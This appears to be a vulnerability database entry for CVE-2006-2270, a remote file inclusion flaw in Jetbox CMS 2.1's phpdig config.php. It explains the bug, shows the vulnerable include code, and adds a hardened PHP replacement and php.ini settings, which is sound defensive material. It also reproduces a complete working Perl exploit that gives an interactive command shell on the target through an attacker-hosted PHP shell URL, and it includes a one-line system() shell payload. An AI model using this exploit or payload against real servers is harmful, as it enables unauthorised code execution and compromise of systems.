Jetbox CMS config.php Remote File Inclusion Vulnerability

Vulnerability ID: 1110225    Vulnerability type: Input validation
Published: 2006-05-07    Updated: 2007-03-08
CVE ID: CVE-2006-2270    CNNVD ID: CNNVD-200605-132
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/1761
https://www.securityfocus.com/bid/17861
https://cxsecurity.com/issue/WLB-2006050058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-132
|Vulnerability details
Jetbox is a content management system written in PHP on top of MySQL. The bundled file jetbox/includes/phpdig/includes/config.php passes the variable $relative_script_path to include() without ever declaring it. With register_globals enabled (which many PHP hosts of the time still had on), a remote attacker can set that variable from the query string, point it at a URL under their control and have the server fetch and execute arbitrary PHP code as the web server user. Vulnerable code:

if (is_file("$relative_script_path/locales/$phpdig_language-language.php")) {
    include "$relative_script_path/locales/$phpdig_language-language.php";
} else {
    include "$relative_script_path/locales/en-language.php";
}

Two details matter for exploitation. First, is_file() does not support the http:// stream wrapper, so the first branch is never taken for a remote path; it is the fallback include of en-language.php that actually fetches the attacker's URL. Second, config.php appends /locales/en-language.php to whatever it received, so the exploit below ends the shell URL with "?": the appended suffix then lands in the query string, which the attacker's web server ignores. phpdig itself had already fixed this issue; Jetbox 2.1 still ships the older, vulnerable copy.
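The following is an added example, not phpdig's or Jetbox's own patch, showing a hardened form of the locale include above. It assumes the locales/ directory sits next to config.php, that the shipped locale names are the ones listed in the allowlist, and (purely for the demonstration) that the language arrives as a lang query parameter; none of those are stated on this page. It is written for PHP 7 or later.

```php
<?php
// Added example: hardened replacement for the phpdig locale include in
// config.php. Not the project's own code; the locale list and the use of
// $_GET['lang'] are assumptions made for this demonstration.

// 1. Never leave $relative_script_path undeclared. Deriving it from this
//    file's own location means a request parameter can neither create it
//    (register_globals) nor override it, so the include prefix is fixed.
$relative_script_path = __DIR__;

// 2. Build the path from an allowlist rather than from the raw language value.
//    Anything not in the list falls back to English, matching the original
//    behaviour, and the returned path is then checked to be a regular file
//    inside the locales directory. realpath() returns false for URL wrappers
//    and collapses ../ and symlinks, so neither a remote URL nor a traversal
//    target can reach include().
function phpdig_locale_file($base, $lang)
{
    $shipped = array('en', 'fr', 'de', 'es', 'it', 'nl');   // assumed set of shipped locales
    if (!in_array($lang, $shipped, true)) {
        $lang = 'en';
    }
    $dir  = realpath($base . '/locales');
    $file = realpath($base . '/locales/' . $lang . '-language.php');
    if ($dir === false || $file === false || !is_file($file)
        || strncmp($file, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;
    }
    return $file;
}

// Assumed input source for the demonstration; the original page does not say
// where $phpdig_language is set.
$phpdig_language = isset($_GET['lang']) ? (string) $_GET['lang'] : 'en';

$locale = phpdig_locale_file($relative_script_path, $phpdig_language);
if ($locale === false) {
    http_response_code(500);
    exit('phpdig: locale file missing');
}
// Keep the include at file scope so the locale's variables stay global, as before.
include $locale;
```

As defence in depth, pair this with register_globals=Off and allow_url_fopen=Off in php.ini (and allow_url_include=Off on PHP 5.2 or later, where remote include was split out into its own switch); with those set, an undeclared include prefix degrades to a local-file bug instead of remote code execution, but the code fix above is what actually closes the hole.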
|Exploit
#!/usr/bin/perl
############
# JetBox CMS Remote File Include
# Exploit & Advisory:  beford <xbefordx gmail com>
#
# usage:  perl own.pl <host> <cmd-shell-url> <cmd-var>
#         perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
#
# cmd shell example: <? system($cmd); ?>
# cmd variable: cmd
#
#############
# Description
###########
# Vendor: http://jetbox.streamedge.com/
# The file jetbox/includes/phpdig/includes/config.php uses the variable
# relative_script_path in an include() function without being declared.
# This issue has already been fixed in phpdig, but jetbox still uses a
# vulnerable version.
############
# Vuln code
############
#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
#    {include "$relative_script_path/locales/$phpdig_language-language.php";}
#else
#    {include "$relative_script_path/locales/en-language.php";}
############

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $Path      = $ARGV[0];   # base URL of the Jetbox install, trailing slash included
my $Pathtocmd = $ARGV[1];   # URL of the attacker-hosted PHP shell
my $cmdv      = $ARGV[2];   # query variable the shell reads its command from

usage() unless defined $Path && defined $Pathtocmd && $cmdv
            && $Path =~ /http:\/\// && $Pathtocmd =~ /http:\/\//;
head();

my $xpl = LWP::UserAgent->new() or die "Could not create user agent\n";

# Interactive loop: every line typed is run on the target; an empty line or EOF ends the session.
print "[shell] \$";
while (my $cmd = <STDIN>) {
    chomp($cmd);
    last if !length($cmd);

    # register_globals lets the query string define $relative_script_path, so
    # config.php ends up including "<shell-url>?&<var>=<cmd>/locales/en-language.php".
    # The "?" turns the suffix appended by config.php into a query string that the
    # attacker's web server ignores, and the shell receives the command in <var>.
    my $url = $Path . 'includes/phpdig/includes/config.php?relative_script_path='
            . $Pathtocmd . '?&' . $cmdv . '=' . $cmd;
    my $res    = $xpl->request(HTTP::Request->new(GET => $url));
    my $return = $res->content;

    if ($return =~ /Error: HTTP request failed!/) {
        print "\nInvalid path for phpshell\n";
        exit;
    }
    elsif ($return =~ /^<br.\/>.<b>Fatal.error/) {
        print "\nInvalid command, or no response\n\n";
    }
    print "\r\n$return\n\r";
    print "[shell] \$";
}

sub head {
    print "\n============================================================================\r\n";
    print " JetBox CMS Remote File Include\r\n";
    print "============================================================================\r\n";
}

sub usage {
    head();
    print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
    print " <host> - Full Path : http://host/jetbox/ [remember the trailing slash]\r\n";
    print " <url-cmd> - PhpShell : http://atacante/shell.gif \r\n";
    print " <var> - var name used in phpshell : cmd  \r\n";
    exit();
}

# milw0rm.com [2006-05-07]
|Affected products
Jetbox Jetbox CMS 2.1
|References

Source: BID
Name: 17861
Link: http://www.securityfocus.com/bid/17861
Source: BUGTRAQ
Name: 20060506 JetBox CMS Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/433121/100/0/threaded
Source: XF
Name: jetboxcms-phpthumb-file-include(28843)
Link: http://xforce.iss.net/xforce/xfdb/28843
Source: XF
Name: jetboxcms-config-file-include(26289)
Link: http://xforce.iss.net/xforce/xfdb/26289
Source: OSVDB
Name: 25313
Link: http://www.osvdb.org/25313
Source: VUPEN
Name: ADV-2006-1686
Link: http://www.frsirt.com/english/advisories/2006/1686
Source: SECTRACK
Name: 1016061
Link: http://securitytracker.com/id?1016061
Source: SREASON
Name: 861
Link: http://securityreason.com/securityalert/861
Source: SECUNIA
Name: 19993
Link: http://secunia.com/advisories/19993